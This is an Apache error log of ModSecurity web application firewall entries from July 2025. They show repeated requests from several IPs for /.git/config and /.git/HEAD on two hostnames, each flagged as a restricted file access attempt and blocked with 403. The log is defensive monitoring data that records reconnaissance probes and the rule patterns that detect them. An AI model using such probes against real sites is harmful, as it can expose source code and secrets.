[Sat Jul 05 06:03:04.605307 2025] [:error] [pid 945018] [client 34.162.141.202:42072] [client 34.162.141.202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGij-M-EaHfkH-3DQY4hkgAAAAQ"]
[Sat Jul 05 06:03:04.605487 2025] [:error] [pid 945018] [client 34.162.141.202:42072] [client 34.162.141.202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGij-M-EaHfkH-3DQY4hkgAAAAQ"]
[Sat Jul 05 07:00:07.752399 2025] [:error] [pid 945017] [client 34.162.39.0:40172] [client 34.162.39.0] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGixVwYPiW9TpyX8Dsay9wAAAAM"]
[Sat Jul 05 07:00:07.752668 2025] [:error] [pid 945017] [client 34.162.39.0:40172] [client 34.162.39.0] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGixVwYPiW9TpyX8Dsay9wAAAAM"]
[Sat Jul 05 07:00:07.752858 2025] [:error] [pid 945017] [client 34.162.39.0:40172] [client 34.162.39.0] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGixVwYPiW9TpyX8Dsay9wAAAAM"]
[Sat Jul 05 07:00:07.863000 2025] [:error] [pid 945017] [client 34.162.39.0:40172] [client 34.162.39.0] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGixVwYPiW9TpyX8Dsay-AAAAAM"]
[Sat Jul 05 07:00:07.863224 2025] [:error] [pid 945017] [client 34.162.39.0:40172] [client 34.162.39.0] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGixVwYPiW9TpyX8Dsay-AAAAAM"]
[Sat Jul 05 07:00:07.863408 2025] [:error] [pid 945017] [client 34.162.39.0:40172] [client 34.162.39.0] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGixVwYPiW9TpyX8Dsay-AAAAAM"]
[Sat Jul 05 07:46:54.404351 2025] [:error] [pid 945015] [client 34.162.177.31:36982] [client 34.162.177.31] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGi8TonQ3HXSURt4X9K-JAAAAAE"]
[Sat Jul 05 07:46:54.404626 2025] [:error] [pid 945015] [client 34.162.177.31:36982] [client 34.162.177.31] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGi8TonQ3HXSURt4X9K-JAAAAAE"]
[Sat Jul 05 07:46:54.404802 2025] [:error] [pid 945015] [client 34.162.177.31:36982] [client 34.162.177.31] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGi8TonQ3HXSURt4X9K-JAAAAAE"]
[Sat Jul 05 07:46:54.514834 2025] [:error] [pid 945015] [client 34.162.177.31:36982] [client 34.162.177.31] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGi8TonQ3HXSURt4X9K-JQAAAAE"]
[Sat Jul 05 07:46:54.515044 2025] [:error] [pid 945015] [client 34.162.177.31:36982] [client 34.162.177.31] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGi8TonQ3HXSURt4X9K-JQAAAAE"]
[Sat Jul 05 07:46:54.515217 2025] [:error] [pid 945015] [client 34.162.177.31:36982] [client 34.162.177.31] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGi8TonQ3HXSURt4X9K-JQAAAAE"]
[Sat Jul 05 09:51:34.661635 2025] [:error] [pid 945020] [client 34.162.87.4:35762] [client 34.162.87.4] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGjZhnmYY6U6UiQyU3bCUgAAAAU"]
[Sat Jul 05 09:51:34.661919 2025] [:error] [pid 945020] [client 34.162.87.4:35762] [client 34.162.87.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGjZhnmYY6U6UiQyU3bCUgAAAAU"]
[Sat Jul 05 09:51:34.662121 2025] [:error] [pid 945020] [client 34.162.87.4:35762] [client 34.162.87.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGjZhnmYY6U6UiQyU3bCUgAAAAU"]
[Sat Jul 05 09:51:34.772552 2025] [:error] [pid 945020] [client 34.162.87.4:35762] [client 34.162.87.4] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGjZhnmYY6U6UiQyU3bCUwAAAAU"]
[Sat Jul 05 09:51:34.772777 2025] [:error] [pid 945020] [client 34.162.87.4:35762] [client 34.162.87.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGjZhnmYY6U6UiQyU3bCUwAAAAU"]
[Sat Jul 05 09:51:34.772960 2025] [:error] [pid 945020] [client 34.162.87.4:35762] [client 34.162.87.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGjZhnmYY6U6UiQyU3bCUwAAAAU"]
[Sat Jul 05 10:41:58.475141 2025] [:error] [pid 945017] [client 34.162.201.127:56628] [client 34.162.201.127] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGjlVgYPiW9TpyX8DsazCAAAAAM"]
[Sat Jul 05 10:41:58.475460 2025] [:error] [pid 945017] [client 34.162.201.127:56628] [client 34.162.201.127] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGjlVgYPiW9TpyX8DsazCAAAAAM"]
[Sat Jul 05 10:41:58.475695 2025] [:error] [pid 945017] [client 34.162.201.127:56628] [client 34.162.201.127] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGjlVgYPiW9TpyX8DsazCAAAAAM"]
[Sat Jul 05 10:41:58.585765 2025] [:error] [pid 945017] [client 34.162.201.127:56628] [client 34.162.201.127] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGjlVgYPiW9TpyX8DsazCQAAAAM"]
[Sat Jul 05 10:41:58.585991 2025] [:error] [pid 945017] [client 34.162.201.127:56628] [client 34.162.201.127] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGjlVgYPiW9TpyX8DsazCQAAAAM"]
[Sat Jul 05 10:41:58.586177 2025] [:error] [pid 945017] [client 34.162.201.127:56628] [client 34.162.201.127] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGjlVgYPiW9TpyX8DsazCQAAAAM"]
[Sat Jul 05 10:45:36.458268 2025] [:error] [pid 951903] [client 34.162.14.236:48106] [client 34.162.14.236] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGjmMGrTi0ICHQeR-OKPYgAAAAc"]
[Sat Jul 05 10:45:36.459208 2025] [:error] [pid 951903] [client 34.162.14.236:48106] [client 34.162.14.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGjmMGrTi0ICHQeR-OKPYgAAAAc"]
[Sat Jul 05 10:45:36.459395 2025] [:error] [pid 951903] [client 34.162.14.236:48106] [client 34.162.14.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGjmMGrTi0ICHQeR-OKPYgAAAAc"]
[Sat Jul 05 10:45:36.571539 2025] [:error] [pid 951903] [client 34.162.14.236:48106] [client 34.162.14.236] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGjmMGrTi0ICHQeR-OKPYwAAAAc"]
[Sat Jul 05 10:45:36.571765 2025] [:error] [pid 951903] [client 34.162.14.236:48106] [client 34.162.14.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGjmMGrTi0ICHQeR-OKPYwAAAAc"]
[Sat Jul 05 10:45:36.571937 2025] [:error] [pid 951903] [client 34.162.14.236:48106] [client 34.162.14.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGjmMGrTi0ICHQeR-OKPYwAAAAc"]
[Sat Jul 05 12:30:36.243143 2025] [:error] [pid 945014] [client 34.162.232.35:38798] [client 34.162.232.35] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGj-zMq4zXHhTgDcWkZbTwAAAAA"]
[Sat Jul 05 12:30:36.243395 2025] [:error] [pid 945014] [client 34.162.232.35:38798] [client 34.162.232.35] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGj-zMq4zXHhTgDcWkZbTwAAAAA"]
[Sat Jul 05 12:30:36.243562 2025] [:error] [pid 945014] [client 34.162.232.35:38798] [client 34.162.232.35] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGj-zMq4zXHhTgDcWkZbTwAAAAA"]
[Sat Jul 05 12:30:36.353209 2025] [:error] [pid 945014] [client 34.162.232.35:38798] [client 34.162.232.35] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGj-zMq4zXHhTgDcWkZbUAAAAAA"]
[Sat Jul 05 12:30:36.353479 2025] [:error] [pid 945014] [client 34.162.232.35:38798] [client 34.162.232.35] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGj-zMq4zXHhTgDcWkZbUAAAAAA"]
[Sat Jul 05 12:30:36.353646 2025] [:error] [pid 945014] [client 34.162.232.35:38798] [client 34.162.232.35] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGj-zMq4zXHhTgDcWkZbUAAAAAA"]
[Sat Jul 05 13:29:10.028194 2025] [:error] [pid 945017] [client 34.162.174.26:46168] [client 34.162.174.26] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGkMhgYPiW9TpyX8DsazGAAAAAM"]
[Sat Jul 05 13:29:10.028455 2025] [:error] [pid 945017] [client 34.162.174.26:46168] [client 34.162.174.26] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGkMhgYPiW9TpyX8DsazGAAAAAM"]
[Sat Jul 05 13:29:10.028618 2025] [:error] [pid 945017] [client 34.162.174.26:46168] [client 34.162.174.26] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGkMhgYPiW9TpyX8DsazGAAAAAM"]
